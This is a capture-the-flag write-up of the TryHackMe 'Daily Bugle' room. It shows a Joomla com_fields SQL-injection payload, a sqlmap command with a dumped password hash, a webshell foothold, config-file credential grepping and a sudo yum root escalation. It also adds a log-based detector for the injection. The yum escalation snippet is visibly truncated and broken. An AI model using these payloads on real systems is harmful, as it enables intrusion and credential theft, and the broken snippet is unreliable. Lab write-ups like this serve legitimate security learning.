THM - Daily Bugle CTF Writeup
Read on Medium (System Weakness)
Link to the room: https://tryhackme.com/room/dailybugle
Initial Scans
whatweb:
http://10.10.141.227/ [200 OK] Apache[2.4.6], Bootstrap,
Cookies[eaa83fe8b963ab08ce9ab7d4a798de05], Country[RESERVED][ZZ], HTML5,
HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.6.40],
HttpOnly[eaa83fe8b963ab08ce9ab7d4a798de05], IP[10.10.141.227], JQuery,
MetaGenerator[Joomla! - Open Source Content Management], PHP[5.6.40],
PasswordField[password],
Script[application/json], Title[Home], X-Powered-By[PHP/5.6.40]
---
Nmap:
Nmap scan report for 10.10.141.227
Host is up (1.5s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
The Webpage
The landing page consists of a mock news media site, with a login panel prompting username and password on the right side.
- We know that this CTF will contain SQLi, so this may be our entry point
- We know from both the CTF as well as the whatweb scan that the site is using the Joomla CMS
SQLi Exploitation
The first step I took after the initial scans was to look up known Joomla SQLi vulnerabilities. I don't [yet] know the Joomla version, but CVE-2017-8917 pops up immediately on Google, and the Exploit-DB page even gives an example sqlmap command!
The vulnerable URL is:
http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Specifically, the "com_fields" parameter is injectable.
Error-based payload:
option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)b)c)
After entering the payload, I did indeed receive an error:
500 Duplicate entry 'qqvpq1qjpvq1' for key 'group_key'
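From the defender's side, the same injection leaves a clear trace in the web server's access log: the list[fullordering] value should only ever be a column name plus ASC/DESC. The following added detection snippet (my own, not part of the original writeup) parses constructed Apache combined-log lines and flags com_fields requests whose ordering value falls outside that shape; the IPs, timestamps and byte counts are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the original post).
SAMPLE_LOG = """\
10.10.10.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 5123
10.10.10.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 411
10.10.10.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT%206600%20FROM(SELECT%20COUNT(*),CONCAT(0x7171767071,(SELECT%20(ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)b)c) HTTP/1.1" 500 411
10.10.10.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 9000
"""

# Apache combined log: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# A legitimate Joomla ordering value looks like "a.ordering ASC":
# a column name, optional whitespace, and ASC or DESC. Anything else
# (quotes, parentheses, SQL functions) is not a valid ordering clause.
SAFE_ORDERING = re.compile(r'^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$', re.IGNORECASE)


def suspicious_requests(log_text):
    """Return (ip, status, decoded_value) for com_fields requests whose
    list[fullordering] parameter is not a plain column/direction pair."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line; skip it
        # parse_qs percent-decodes the values, so %27 becomes a quote
        qs = parse_qs(urlsplit(m.group('path')).query, keep_blank_values=True)
        if qs.get('option') != ['com_fields']:
            continue
        for value in qs.get('list[fullordering]', []):
            if not SAFE_ORDERING.match(value.strip()):
                hits.append((m.group('ip'), m.group('status'), value))
    return hits


if __name__ == '__main__':
    for ip, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} list[fullordering]={value!r}")
```

The whitelist check mirrors the shape of the upstream fix (validating the ordering value instead of passing it into the query), so the same rule can be reused as a WAF or log-alert condition.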
After experimenting with the requests a bit longer, I moved on to sqlmap and used the -r switch with a text file containing a Burp request carrying the vulnerable parameters:
sqlmap -r request.txt --users --passwords --tables --random-agent
This returned a user entry and hash:
Database: joomla
Table: #__users
[1 entry]
+-----+------------+--------------------------------------------------------------+----------+
| id | name | password | username |
+-----+------------+--------------------------------------------------------------+----------+
| 811 | Super User | $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm | jonah |
+-----+------------+--------------------------------------------------------------+----------+
The hash is a bcrypt (Blowfish-based, $2y$) hash. After running hashcat, the password was cracked.
Foothold
We are now authenticated on the website as the user jonah ("Super User"). The next step is to turn this into a foothold on the actual machine.
Since we appear to have admin rights, it may be possible to upload a webshell via the administrator panel. I downloaded a random poll extension, replaced the install script with a webshell, zipped it, uploaded it, and got my shell.
I upgraded the shell with:
python -c 'import pty; pty.spawn("/bin/bash")'
After searching through the system, I found credentials in the configuration.php file:
cat * | grep password
The password worked for user jjameson, and I obtained the user flag.
Privilege Escalation
Now that a password has been obtained, it is possible to check for sudo command access:
sudo -l
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
With sudo access to yum, we can use the privesc method from GTFOBins to escalate to root:
TF=$(mktemp -d)
cat >$TF/x<$TF/y.conf<$TF/y.py<
This method creates a custom plugin that spawns a shell. After successfully executing this exploit and escalating privileges to root, we can obtain the root flag!